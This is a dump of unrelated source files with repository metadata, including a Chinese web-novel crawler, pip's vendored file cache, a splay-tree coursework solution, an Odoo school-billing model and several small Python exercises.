| 2023-07-07T18:17:09 | 2017-04-10T17:16:51 |
Python
|
UTF-8
|
Python
| false | false | 510 |
py
|
from pkg_resources import resource_filename
BCLASS_CLASSIFIER_PATH = resource_filename('uncertainty', 'models/bclass.p')
MCLASS_CLASSIFIER_PATH = resource_filename('uncertainty', 'models/mclass.p')
VECTORIZER_PATH = resource_filename('uncertainty', 'vectorizers/vectorizer.p')
UNCERTAINTY_CLASS_MAP = {
'speculation_modal_probable_': 'E',
'speculation_hypo_doxastic _': 'D',
'speculation_hypo_condition _': 'N',
'speculation_hypo_investigation _': 'I',
'O': 'C'
}
|
[
"[email protected]"
] | |
5865cee0434fa771b0ffd1e3c9bcb56df6e08c4a
|
3967e42abb6f497ede6d342e8f74bd8150f9c52d
|
/src/spiders/qidiancom.py
|
b70dc6414c2c1f6637e2011d657997aa17ae923f
|
[
"Apache-2.0"
] |
permissive
|
varunprashar5/lightnovel-crawler
|
4886862115c5c3e15a9137e698e14253e14b7423
|
4ca387f3c8f17771befad1d48d417bbc7b9f8bfd
|
refs/heads/master
| 2020-12-01T22:27:33.699798 | 2019-12-29T05:25:09 | 2019-12-29T05:25:09 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,465 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
from ..utils.crawler import Crawler
logger = logging.getLogger('QIDIAN_COM')
chapter_list_url = 'https://book.qidian.com/ajax/book/category?_csrfToken=%s&bookId=%s'
chapter_details_url = 'https://read.qidian.com/chapter/%s'
class QidianComCrawler(Crawler):
def initialize(self):
self.home_url = 'https://www.qidian.com/'
# end def
def read_novel_info(self):
'''Get novel title, autor, cover etc'''
logger.debug('Visiting %s', self.novel_url)
soup = self.get_soup(self.novel_url)
self.novel_title = soup.select_one('.book-info h1 em').text
logger.info('Novel title: %s', self.novel_title)
self.novel_author = soup.select_one('.book-info h1 a.writer').text
logger.info('Novel author: %s', self.novel_author)
book_img = soup.select_one('#bookImg')
self.novel_cover = self.absolute_url(book_img.find('img')['src'])
self.novel_cover = '/'.join(self.novel_cover.split('/')[:-1])
logger.info('Novel cover: %s', self.novel_cover)
self.book_id = book_img['data-bid']
logger.debug('Book Id: %s', self.book_id)
self.csrf = self.cookies['_csrfToken']
logger.debug('CSRF Token: %s', self.csrf)
volume_url = chapter_list_url % (self.csrf, self.book_id)
logger.debug('Visiting %s', volume_url)
data = self.get_json(volume_url)
for volume in data['data']['vs']:
vol_id = len(self.volumes) + 1
self.volumes.append({
'id': vol_id,
'title': volume['vN'],
})
for chapter in volume['cs']:
ch_id = len(self.chapters) + 1
self.chapters.append({
'id': ch_id,
'volume': vol_id,
'title': chapter['cN'],
'url': chapter_details_url % chapter['cU'],
})
# end for
# end for
# end def
def download_chapter_body(self, chapter):
'''Download body of a single chapter and return as clean html format'''
logger.info('Downloading %s', chapter['url'])
soup = self.get_soup(chapter['url'])
chapter['body_lock'] = True
chapter['title'] = soup.select_one('h3.j_chapterName').text.strip()
return soup.select_one('div.j_readContent').extract()
# end def
# end class
|
[
"[email protected]"
] | |
8e7ea66678d6525ed22d3dd5952486d8e44cd520
|
6923f79f1eaaba0ab28b25337ba6cb56be97d32d
|
/Fluid_Engine_Development_Doyub_Kim/external/src/pystring/SConscript
|
b6e8c9660762838555a40f518621f6873e7cf39a
|
[
"MIT"
] |
permissive
|
burakbayramli/books
|
9fe7ba0cabf06e113eb125d62fe16d4946f4a4f0
|
5e9a0e03aa7ddf5e5ddf89943ccc68d94b539e95
|
refs/heads/master
| 2023-08-17T05:31:08.885134 | 2023-08-14T10:05:37 | 2023-08-14T10:05:37 | 72,460,321 | 223 | 174 | null | 2022-10-24T12:15:06 | 2016-10-31T17:24:00 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 320 |
"""
Copyright (c) 2016 Doyub Kim
"""
Import('env', 'os', 'utils')
script_dir = os.path.dirname(File('SConscript').rfile().abspath)
lib_env = env.Clone()
lib_env.Append(CPPPATH = [os.path.join(script_dir, 'pystring'), script_dir])
lib = lib_env.Library('pystring', 'pystring/pystring.cpp')
Return('lib_env', 'lib')
|
[
"[email protected]"
] | ||
1d443fcd8a68dc9c0124dcbff16c16d020b695ab
|
9e549ee54faa8b037f90eac8ecb36f853e460e5e
|
/venv/lib/python3.6/site-packages/pip/_vendor/cachecontrol/caches/file_cache.py
|
10f2f222d46d9d3c3a69f254940903cb2be1c86b
|
[
"MIT"
] |
permissive
|
aitoehigie/britecore_flask
|
e8df68e71dd0eac980a7de8c0f20b5a5a16979fe
|
eef1873dbe6b2cc21f770bc6dec783007ae4493b
|
refs/heads/master
| 2022-12-09T22:07:45.930238 | 2019-05-15T04:10:37 | 2019-05-15T04:10:37 | 177,354,667 | 0 | 0 |
MIT
| 2022-12-08T04:54:09 | 2019-03-24T00:38:20 |
Python
|
UTF-8
|
Python
| false | false | 4,176 |
py
|
import hashlib
import os
from textwrap import dedent
from ..cache import BaseCache
from ..controller import CacheController
try:
FileNotFoundError
except NameError:
# py2.X
FileNotFoundError = (IOError, OSError)
def _secure_open_write(filename, fmode):
# We only want to write to this file, so open it in write only mode
flags = os.O_WRONLY
# os.O_CREAT | os.O_EXCL will fail if the file already exists, so we only
# will open *new* files.
# We specify this because we want to ensure that the mode we pass is the
# mode of the file.
flags |= os.O_CREAT | os.O_EXCL
# Do not follow symlinks to prevent someone from making a symlink that
# we follow and insecurely open a cache file.
if hasattr(os, "O_NOFOLLOW"):
flags |= os.O_NOFOLLOW
# On Windows we'll mark this file as binary
if hasattr(os, "O_BINARY"):
flags |= os.O_BINARY
# Before we open our file, we want to delete any existing file that is
# there
try:
os.remove(filename)
except (IOError, OSError):
# The file must not exist already, so we can just skip ahead to opening
pass
# Open our file, the use of os.O_CREAT | os.O_EXCL will ensure that if a
# race condition happens between the os.remove and this line, that an
# error will be raised. Because we utilize a lockfile this should only
# happen if someone is attempting to attack us.
fd = os.open(filename, flags, fmode)
try:
return os.fdopen(fd, "wb")
except:
# An error occurred wrapping our FD in a file object
os.close(fd)
raise
class FileCache(BaseCache):
def __init__(
self,
directory,
forever=False,
filemode=0o0600,
dirmode=0o0700,
use_dir_lock=None,
lock_class=None,
):
if use_dir_lock is not None and lock_class is not None:
raise ValueError("Cannot use use_dir_lock and lock_class together")
try:
from pip._vendor.lockfile import LockFile
from pip._vendor.lockfile.mkdirlockfile import MkdirLockFile
except ImportError:
notice = dedent(
"""
NOTE: In order to use the FileCache you must have
lockfile installed. You can install it via pip:
pip install lockfile
"""
)
raise ImportError(notice)
else:
if use_dir_lock:
lock_class = MkdirLockFile
elif lock_class is None:
lock_class = LockFile
self.directory = directory
self.forever = forever
self.filemode = filemode
self.dirmode = dirmode
self.lock_class = lock_class
@staticmethod
def encode(x):
return hashlib.sha224(x.encode()).hexdigest()
def _fn(self, name):
# NOTE: This method should not change as some may depend on it.
# See: https://github.com/ionrock/cachecontrol/issues/63
hashed = self.encode(name)
parts = list(hashed[:5]) + [hashed]
return os.path.join(self.directory, *parts)
def get(self, key):
name = self._fn(key)
try:
with open(name, "rb") as fh:
return fh.read()
except FileNotFoundError:
return None
def set(self, key, value):
name = self._fn(key)
# Make sure the directory exists
try:
os.makedirs(os.path.dirname(name), self.dirmode)
except (IOError, OSError):
pass
with self.lock_class(name) as lock:
# Write our actual file
with _secure_open_write(lock.path, self.filemode) as fh:
fh.write(value)
def delete(self, key):
name = self._fn(key)
if not self.forever:
try:
os.remove(name)
except FileNotFoundError:
pass
def url_to_file_path(url, filecache):
"""Return the file cache path based on the URL.
This does not ensure the file exists!
"""
key = CacheController.cache_url(url)
return filecache._fn(key)
|
[
"[email protected]"
] | |
6757f60ad54e92de598316caec907e610dd16c53
|
e01c5d1ee81cc4104b248be375e93ae29c4b3572
|
/Sequence4/DS/Week5/submission/sub-range-4.py
|
585c33c2a3133ca7749fcb1568e035d6b909e7e3
|
[] |
no_license
|
lalitzz/DS
|
7de54281a34814601f26ee826c722d123ee8bd99
|
66272a7a8c20c0c3e85aa5f9d19f29e0a3e11db1
|
refs/heads/master
| 2021-10-14T09:47:08.754570 | 2018-12-29T11:00:25 | 2018-12-29T11:00:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,351 |
py
|
# python3
from sys import stdin
import sys, threading
sys.setrecursionlimit(10**6) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
# Splay tree implementation
# Vertex of a splay tree
class Vertex:
def __init__(self, key, sum, left, right, parent):
(self.key, self.sum, self.left, self.right, self.parent) = (key, sum, left, right, parent)
class SplayTree:
def update(self, v):
if v == None:
return
v.sum = v.key + (v.left.sum if v.left != None else 0) + (v.right.sum if v.right != None else 0)
if v.left != None:
v.left.parent = v
if v.right != None:
v.right.parent = v
def smallRotation(self, v):
parent = v.parent
if parent == None:
return
grandparent = v.parent.parent
if parent.left == v:
m = v.right
v.right = parent
parent.left = m
else:
m = v.left
v.left = parent
parent.right = m
self.update(parent)
self.update(v)
v.parent = grandparent
if grandparent != None:
if grandparent.left == parent:
grandparent.left = v
else:
grandparent.right = v
def bigRotation(self, v):
if v.parent.left == v and v.parent.parent.left == v.parent:
# Zig-zig
self.smallRotation(v.parent)
self.smallRotation(v)
elif v.parent.right == v and v.parent.parent.right == v.parent:
# Zig-zig
self.smallRotation(v.parent)
self.smallRotation(v)
else:
# Zig-zag
self.smallRotation(v)
self.smallRotation(v)
# Makes splay of the given vertex and makes
# it the new root.
def splay(self, v):
if v == None:
return None
while v.parent != None:
if v.parent.parent == None:
self.smallRotation(v)
break
self.bigRotation(v)
return v
# Searches for the given key in the tree with the given root
# and calls splay for the deepest visited node after that.
# Returns pair of the result and the new root.
# If found, result is a pointer to the node with the given key.
# Otherwise, result is a pointer to the node with the smallest
# bigger key (next value in the order).
# If the key is bigger than all keys in the tree,
# then result is None.
def find(self, root, key):
v = root
last = root
next = None
while v != None:
if v.key >= key and (next == None or v.key < next.key):
next = v
last = v
if v.key == key:
break
if v.key < key:
v = v.right
else:
v = v.left
root = self.splay(last)
return (next, root)
def split(self, root, key):
(result, root) = self.find(root, key)
if result == None:
return (root, None)
right = self.splay(result)
left = right.left
right.left = None
if left != None:
left.parent = None
self.update(left)
self.update(right)
return (left, right)
def merge(self, left, right):
if left == None:
return right
if right == None:
return left
while right.left != None:
right = right.left
right = self.splay(right)
right.left = left
self.update(right)
return right
class SetRange:
# Code that uses splay tree to solve the problem
root = None
S = SplayTree()
def insert(self, x):
(left, right) = self.S.split(self.root, x)
new_vertex = None
if right == None or right.key != x:
new_vertex = Vertex(x, x, None, None, None)
self.root = self.S.merge(self.S.merge(left, new_vertex), right)
def erase(self, x):
if self.search(x) is None:
return
self.S.splay(self.root)
self.root = self.S.merge(self.root.left, self.root.right)
if self.root is not None:
self.root.parent = None
def search(self, x):
# Implement find yourself
result, self.root = self.S.find(self.root, x)
if result is None or self.root.key != x:
return None
return result.key
def sum(self, fr, to):
(left, middle) = self.S.split(self.root, fr)
(middle, right) = self.S.split(middle, to + 1)
ans = 0
# Complete the implementation of sum
if middle is None:
ans = 0
self.root = self.S.merge(left, right)
else:
ans = middle.sum
self.root = self.S.merge(self.S.merge(left, middle), right)
return ans
def get_tree(self):
print(self.root.key)
self._get_tree(self.root)
def _get_tree(self, root):
if root:
self._get_tree(root.left)
print(root.key)
self._get_tree(root.right)
def main():
MODULO = 1000000001
n = int(stdin.readline())
last_sum_result = 0
s = SetRange()
for i in range(n):
line = stdin.readline().split()
if line[0] == '+':
x = int(line[1])
s.insert((x + last_sum_result) % MODULO)
elif line[0] == '-':
x = int(line[1])
s.erase((x + last_sum_result) % MODULO)
elif line[0] == '?':
x = int(line[1])
print('Found' if s.search((x + last_sum_result) % MODULO) is not None else 'Not found')
elif line[0] == 's':
l = int(line[1])
r = int(line[2])
res = s.sum((l + last_sum_result) % MODULO, (r + last_sum_result) % MODULO)
print(res)
last_sum_result = res % MODULO
elif line[0] == 'c':
s.get_tree()
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
871f3e48a561c6d3a0a81e78fb26e52f6fa2eb7c
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/16_0_2/gavicharla/codejam1.py
|
25da9175da664053709c8d25e93ab4bca77cade7
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 |
Python
|
UTF-8
|
Python
| false | false | 515 |
py
|
def flip(s,l):
str1 = []
for i in range(l):
if(s[i] == '-'):
str1.append('+')
else:
str1.append('-')
return "".join(str1)
test_cases = int(raw_input())
for test in range(test_cases):
s = raw_input()
l = len(s)
count = l
let =0
while ('-' in s):
let+=1
last_m = s[:count].rfind("-")
s = flip(s[:last_m+1],last_m+1)+s[last_m+1:]
count = s.rfind("+")
print "case #"+str(test+1)+": "+str(let)
|
[
"[[email protected]]"
] | |
f039f11f1012417d425afe36144602e290845663
|
dc182e5b4597bdd104d6695c03744a12ebfe2533
|
/PythonScripts/cache_decorator.py
|
13a86e3faccaa6620f606d3880ecb8559d34a2e1
|
[] |
no_license
|
srinaveendesu/Programs
|
06fb4a4b452445e4260f9691fe632c732078d54d
|
f6dbd8db444678b7ae7658126b59b381b3ab0bab
|
refs/heads/master
| 2023-01-27T14:42:40.989127 | 2023-01-18T22:36:14 | 2023-01-18T22:36:14 | 129,948,488 | 1 | 0 | null | 2022-09-13T23:06:04 | 2018-04-17T18:30:13 |
Python
|
UTF-8
|
Python
| false | false | 404 |
py
|
def cache(func):
    """Memoize *func*: keep a cache of previous calls keyed by arguments.

    The key combines positional arguments and keyword items, so all
    arguments must be hashable and keyword order is significant.
    The cache dict is exposed as ``wrapper.cache`` for inspection.
    """
    # Bug fix: the original module used functools.wraps without ever
    # importing functools, raising NameError at decoration time.
    import functools

    @functools.wraps(func)
    def wrapper_cache(*args, **kwargs):
        cache_key = args + tuple(kwargs.items())
        if cache_key not in wrapper_cache.cache:
            wrapper_cache.cache[cache_key] = func(*args, **kwargs)
        return wrapper_cache.cache[cache_key]
    wrapper_cache.cache = dict()
    return wrapper_cache
|
[
"[email protected]"
] | |
4a37455d9a0b65a8c4aec6586528fc1fcda1e472
|
085d3f2f8de5442d69962a65b8acd79478599022
|
/2.Dictionaries - the root of Python/Safely finding by key.py
|
e66f37889bfe6d285916f26ea00f6830005db3ba
|
[] |
no_license
|
Mat4wrk/Data-Types-for-Data-Science-in-Python-Datacamp
|
bfe8f8c4d4bc3998ef612f0d3137b15e662209d0
|
c2eb30d3c500f69486921d26071a2ef2244e0402
|
refs/heads/main
| 2023-03-13T10:06:10.748044 | 2021-03-07T14:43:25 | 2021-03-07T14:43:25 | 331,574,648 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 260 |
py
|
# NOTE(review): assumes a dict `names` (rank -> name) is defined earlier
# in the exercise environment -- it is not defined in this snippet.
# Safely print rank 7 from the names dictionary (None if absent)
print(names.get(7))
# Safely print the type of rank 100 from the names dictionary
print(type(names.get(100)))
# Safely print rank 105 from the names dictionary or 'Not Found'
print(names.get(105, 'Not Found'))
|
[
"[email protected]"
] | |
368da12078ad24bb8c1403761b573a5acd4f731c
|
2a54e8d6ed124c64abb9e075cc5524bb859ba0fa
|
/.history/1-Python-Basics/4-bind()-complex_20200412164915.py
|
3951d6e1beff4faa4c6fcf2e2f7923a3bcedeff0
|
[] |
no_license
|
CaptainStorm21/Python-Foundation
|
01b5fbaf7a913506518cf22e0339dd948e65cea1
|
a385adeda74f43dd7fb2d99d326b0be23db25024
|
refs/heads/master
| 2021-05-23T01:29:18.885239 | 2020-04-23T19:18:06 | 2020-04-23T19:18:06 | 253,171,611 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 321 |
py
|
# complex(): build complex numbers from real/imaginary parts or a string
z = complex(2, -3)
print(z)
z = complex(1)
print(z)
z = complex()
print(z)
z = complex('5-9j')
print(z)
# expected output:
# (2-3j)
# (1+0j)
# 0j
# (5-9j)
# bin(): integer -> binary string
print(bin(5))
# binary output 0b101
# Python prefixes binary literals with '0b';
# outside Python the binary form of 5 is written plainly as 101.
# Converting binary back to an integer would be int('101', 2).
print()
|
[
"[email protected]"
] | |
782de249b46f09546dcf741a0fc5f71b7f5aca5e
|
a03303e46f21697c9da87d0bb0f7b0a3077aba5c
|
/siswa_keu_ocb11/models/biaya_ta_jenjang.py
|
8c0710c7ba375eaad0378bdde9362af08f91cddd
|
[] |
no_license
|
butirpadi/flectra_app_sek
|
fccd3e47ef261e116478e6da7f0cc544ee67f127
|
00fa36d9176511f8ffe3c7636a8434ee2ed8c756
|
refs/heads/master
| 2020-04-06T10:26:37.053024 | 2018-11-19T23:59:34 | 2018-11-20T00:17:02 | 157,380,460 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,290 |
py
|
# -*- coding: utf-8 -*-
from flectra import models, fields, api, _
from pprint import pprint
from datetime import datetime, date
import calendar
class biaya_ta_jenjang(models.Model):
    """Fee ("biaya") attached to one academic-year/level pair.

    Stores the price of a fee type for a given tahun-ajaran/jenjang and
    (re)generates the per-student billing lines derived from it.
    """
    _name = 'siswa_keu_ocb11.biaya_ta_jenjang'

    # Display name mirrors the linked fee record.
    name = fields.Char('Name', related="biaya_id.name")
    tahunajaran_jenjang_id = fields.Many2one('siswa_ocb11.tahunajaran_jenjang', string='Tahun Ajaran', required=True, ondelete='cascade')
    biaya_id = fields.Many2one('siswa_keu_ocb11.biaya', string='Biaya', required=True)
    # When True, `harga` applies to male students and `harga_alt` to female.
    is_different_by_gender = fields.Boolean('Different by Gender', related='biaya_id.is_different_by_gender')
    harga = fields.Float('Harga', required=True, default=0)
    harga_alt = fields.Float('Harga (Alt)', required=True, default=0)

    def recompute_biaya_ta_jenjang(self):
        """Create billing lines for every active student of this year/level.

        Monthly fees ("is_bulanan") get one line per month (1-12);
        one-off fees get a single line.  The student's partner record is
        then updated with the new totals.
        """
        print('recompute biaya ta jenjang')
        # Fetch the class-membership records for this year and level.
        rb_sis_ids = self.env['siswa_ocb11.rombel_siswa'].search([
            ('tahunajaran_id', '=', self.tahunajaran_jenjang_id.tahunajaran_id.id),
            ('jenjang_id', '=', self.tahunajaran_jenjang_id.jenjang_id.id),
        ])
        for sis in rb_sis_ids:
            siswa = sis.siswa_id
            total_biaya = 0
            if sis.siswa_id.active:
                # Fee may target everyone ('all'), returning students
                # only ('lama'), or new students only ('baru').
                if self.biaya_id.assign_to == 'all' or (siswa.is_siswa_lama and self.biaya_id.assign_to == 'lama') or (not siswa.is_siswa_lama and self.biaya_id.assign_to == 'baru'):
                    # if siswa.is_siswa_lama and self.biaya_id.is_siswa_baru_only:
                    #     print('skip')
                    # else:
                    print('JENJANG ID : ' + str(self.tahunajaran_jenjang_id.jenjang_id.id))
                    if self.biaya_id.is_bulanan:
                        # Monthly fee: one billing line per calendar month.
                        for bulan_index in range(1, 13):
                            harga = self.harga
                            if self.biaya_id.is_different_by_gender:
                                if siswa.jenis_kelamin == 'perempuan':
                                    harga = self.harga_alt
                            self.env['siswa_keu_ocb11.siswa_biaya'].create({
                                'name' : self.biaya_id.name + ' ' + calendar.month_name[bulan_index],
                                'siswa_id' : siswa.id,
                                'tahunajaran_id' : self.tahunajaran_jenjang_id.tahunajaran_id.id,
                                'biaya_id' : self.biaya_id.id,
                                'bulan' : bulan_index,
                                'harga' : harga,
                                'amount_due' : harga,
                                'jenjang_id' : self.tahunajaran_jenjang_id.jenjang_id.id
                            })
                            total_biaya += harga
                    else:
                        # One-off fee: a single billing line.
                        harga = self.harga
                        if self.biaya_id.is_different_by_gender:
                            if siswa.jenis_kelamin == 'perempuan':
                                harga = self.harga_alt
                        self.env['siswa_keu_ocb11.siswa_biaya'].create({
                            'name' : self.biaya_id.name,
                            'siswa_id' : siswa.id,
                            'tahunajaran_id' : self.tahunajaran_jenjang_id.tahunajaran_id.id,
                            'biaya_id' : self.biaya_id.id,
                            'harga' : harga,
                            'amount_due' : harga,
                            'jenjang_id' : self.tahunajaran_jenjang_id.jenjang_id.id
                        })
                        total_biaya += harga
                    # Update the student's partner totals (total_biaya and
                    # the running amount due).
                    # total_biaya = sum(self.harga for by in self.biayas)
                    print('ID SISWA : ' + str(siswa.id))
                    res_partner_siswa = self.env['res.partner'].search([('id', '=', siswa.id)])
                    self.env['res.partner'].search([('id', '=', siswa.id)]).write({
                        'total_biaya' : total_biaya,
                        'amount_due_biaya' : res_partner_siswa.amount_due_biaya + total_biaya,
                    })
        # Recompute Tagihan Siswa Dashboard/ Keuangan Dashboard
        self.recompute_dashboard()

    def reset_biaya_ta_jenjang(self):
        """Delete this fee's still-open billing lines for the year/level."""
        rb_sis_ids = self.env['siswa_ocb11.rombel_siswa'].search([
            ('tahunajaran_id', '=', self.tahunajaran_jenjang_id.tahunajaran_id.id),
            ('jenjang_id', '=', self.tahunajaran_jenjang_id.jenjang_id.id),
        ])
        for sis in rb_sis_ids:
            siswa = sis.siswa_id
            # Only lines still in state 'open' are removed; paid lines stay.
            self.env['siswa_keu_ocb11.siswa_biaya'].search(['&', '&', '&',
                ('tahunajaran_id', '=', self.tahunajaran_jenjang_id.tahunajaran_id.id),
                ('biaya_id', '=', self.biaya_id.id),
                ('state', '=', 'open'),
                ('siswa_id', '=', siswa.id),
            ]).unlink()
        # Recompute Tagihan Siswa Dashboard/ Keuangan Dashboard
        self.recompute_dashboard()

    def recompute_dashboard(self):
        """Refresh the finance dashboard record after billing changes."""
        dash_keuangan_id = self.env['ir.model.data'].search([('name', '=', 'default_dashboard_pembayaran')]).res_id
        dash_keuangan = self.env['siswa_keu_ocb11.keuangan_dashboard'].search([('id', '=', dash_keuangan_id)])
        for dash in dash_keuangan:
            dash.compute_keuangan()
        print('Recompute Keuangan Dashboard done')

    @api.model
    def create(self, vals):
        # When the fee does not differ by gender, keep both prices equal.
        if not vals['is_different_by_gender']:
            vals['harga_alt'] = vals['harga']
        result = super(biaya_ta_jenjang, self).create(vals)
        return result

    @api.multi
    def write(self, vals):
        self.ensure_one()
        # print('isisnya : ')
        # pprint(vals)
        # # get biaya
        # # biaya_ta_jenjang = self.env['siswa_keu_ocb11.biaya_ta_jenjang'].search([('id','=',vals['id'])])
        # biaya = self.env['siswa_keu_ocb11.biaya'].search([('id','=',vals['biaya_id'])])
        # if not biaya[0].is_different_by_gender: #vals['is_different_by_gender']:
        if not self.biaya_id.is_different_by_gender:
            # Mirror harga into harga_alt so both stay in sync.
            if 'harga' in vals:
                vals['harga_alt'] = vals['harga']
        res = super(biaya_ta_jenjang, self).write(vals)
        return res
|
[
"[email protected]"
] | |
53bd002833d9a292adb9fc9597fcf51a13a3e702
|
ff7d3116024c9df01b94191ddfa334e4a6782ae6
|
/mandal/asgi.py
|
b5b92dc813812b64f6029c072cbb314048f69a23
|
[
"MIT"
] |
permissive
|
jhnnsrs/arbeider
|
f5f708ee1026a9e9573a6f8a87c3b9e2fd6b5e33
|
4c5637913331c998a262ae0deca516b236845200
|
refs/heads/master
| 2021-05-26T10:31:16.279628 | 2020-04-08T13:40:26 | 2020-04-08T13:40:26 | 254,095,863 | 0 | 0 |
MIT
| 2020-04-08T13:40:28 | 2020-04-08T13:29:31 | null |
UTF-8
|
Python
| false | false | 318 |
py
|
"""
ASGI entrypoint. Configures Django and then runs the application
defined in the ASGI_APPLICATION setting.
"""
import os
import django
from channels.routing import get_default_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mandal.settings")
django.setup()
application = get_default_application()
|
[
"[email protected]"
] | |
16573c15b3817ed9f64b13f466428536b50da9d6
|
5b4312ddc24f29538dce0444b7be81e17191c005
|
/autoware.ai/1.12.0_cuda/build/waypoint_follower/catkin_generated/generate_cached_setup.py
|
01cfc657005e5167ef4e8abd08b42b76f522be17
|
[
"MIT"
] |
permissive
|
muyangren907/autoware
|
b842f1aeb2bfe7913fb2be002ea4fc426b4e9be2
|
5ae70f0cdaf5fc70b91cd727cf5b5f90bc399d38
|
refs/heads/master
| 2020-09-22T13:08:14.237380 | 2019-12-03T07:12:49 | 2019-12-03T07:12:49 | 225,167,473 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,929 |
py
|
# -*- coding: utf-8 -*-
# Auto-generated catkin helper: renders the workspace environment to a
# cached shell script (setup_cached.sh) and marks it executable.
from __future__ import print_function
import argparse
import os
import stat
import sys

# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
    sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
    from catkin.environment_cache import generate_environment_script
except ImportError:
    # search for catkin package in all workspaces and prepend to path
    for workspace in "/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_health_checker;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/amathutils_lib;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/tablet_socket_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_system_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_config_msgs;/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/install/autoware_build_flags;/opt/ros/melodic".split(';'):
        python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
        if os.path.isdir(os.path.join(python_path, 'catkin')):
            sys.path.insert(0, python_path)
            break
    from catkin.environment_cache import generate_environment_script

# Render the environment of devel/env.sh into a list of shell lines.
code = generate_environment_script('/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/build/waypoint_follower/devel/env.sh')

output_filename = '/home/muyangren907/autoware/autoware.ai/1.12.0_cuda/build/waypoint_follower/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
    #print('Generate script for cached setup "%s"' % output_filename)
    f.write('\n'.join(code))

# Make the generated script executable for the owner.
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
|
[
"[email protected]"
] | |
0a8b93c86f1f59ac957d675eef30b726dc06c777
|
52a4d869976a97498bdf56a8d0ff92cac138a136
|
/Algorithmic Heights/rosalind_3_degarray.py
|
1ed82de8791f3769afe522fe22c1bee1abb2a87e
|
[] |
no_license
|
aakibinesar/Rosalind
|
d726369a787d848cc378976b886189978a60a3a5
|
375bbdbfb16bf11b2f980701bbd0ba74a1605cdb
|
refs/heads/master
| 2022-08-18T09:36:00.941080 | 2020-05-24T18:49:38 | 2020-05-24T18:49:38 | 264,722,651 | 0 | 0 | null | 2020-05-17T17:51:03 | 2020-05-17T17:40:59 | null |
UTF-8
|
Python
| false | false | 380 |
py
|
# Rosalind DEG: print the degree of every vertex of an undirected graph.
# Input file: first line "vertices edges", then one "u v" pair per edge.
lines = open('rosalind_deg.txt', 'r').readlines()
vertices, edges = (int(val) for val in lines[0].split())

# Tally both endpoints of each edge in a single O(E) pass; the original
# rescanned the whole edge list once per vertex, which is O(V * E).
degree = [0] * (vertices + 1)  # index 0 unused; vertices are numbered 1..V
for line in lines[1:edges + 1]:
    u, v = (int(val) for val in line.split())
    degree[u] += 1
    degree[v] += 1

print(' '.join(str(num) for num in degree[1:]))
|
[
"[email protected]"
] | |
3e677c83fd12cc5c2661147aa8b3dca9d0b689e4
|
15c4278a1a70ad3c842b72cba344f96fca43f991
|
/newpro/newapp/admin.py
|
37dac0ac21c8bfb1c6e0d008a060f3977faa28a0
|
[] |
no_license
|
nivyashri05/Task1
|
d9914cf5bb8947ef00e54f77480c6f5f375c76ad
|
9e9b03961eb1144d1b1a936159082ad80d32ce31
|
refs/heads/master
| 2023-01-06T01:04:17.321503 | 2020-11-10T15:31:02 | 2020-11-10T15:31:02 | 311,691,678 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 434 |
py
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from newapp.models import User


class UserAdmin(BaseUserAdmin):
    """Admin options for the custom User model."""
    list_display = ('email','username','phone','is_admin','is_staff','timestamp')
    search_fields = ('email','username',)
    readonly_fields=('date_joined', 'last_login')

    filter_horizontal = ()
    list_filter = ()
    fieldsets = ()

# Bug fix: the original registered BaseUserAdmin, which silently ignored
# the UserAdmin configuration defined above (dead code).  Register the
# customised admin class instead.
admin.site.register(User, UserAdmin)
|
[
"[email protected]"
] | |
16d4ac62c0efe8567434b83a272a3035cd8c8990
|
d75371f629cf881de3c49b53533879a5b862da2e
|
/python/search-a-2d-matrix.py
|
3ce6ce1d52b91816fccec4a1e5592f5c548b2cf5
|
[] |
no_license
|
michaelrbock/leet-code
|
7352a1e56429bb03842b588ba6bda2a90315a2f4
|
070db59d4e0ded3fb168c89c3d73cb09b3c4fe86
|
refs/heads/master
| 2020-04-01T05:40:49.262575 | 2019-10-10T22:03:10 | 2019-10-10T22:03:10 | 152,914,631 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,614 |
py
|
def binary_row(rows, target):
    """Pick the row of a row-sorted matrix that may contain target.

    rows is the list of first-column values (sorted ascending).  Returns
    (index, flag): flag is True when rows[index] == target exactly,
    otherwise None and index is the candidate row to search within.

    NOTE(review): `lo = mid` / `hi = mid` never overshoot here, but when
    target is smaller than every element the loop drains and falls
    through to the last row -- callers must pre-check
    rows[0] <= target (Solution1.searchMatrix does).
    """
    if len(rows) == 1:
        return 0, None
    if len(rows) == 2:
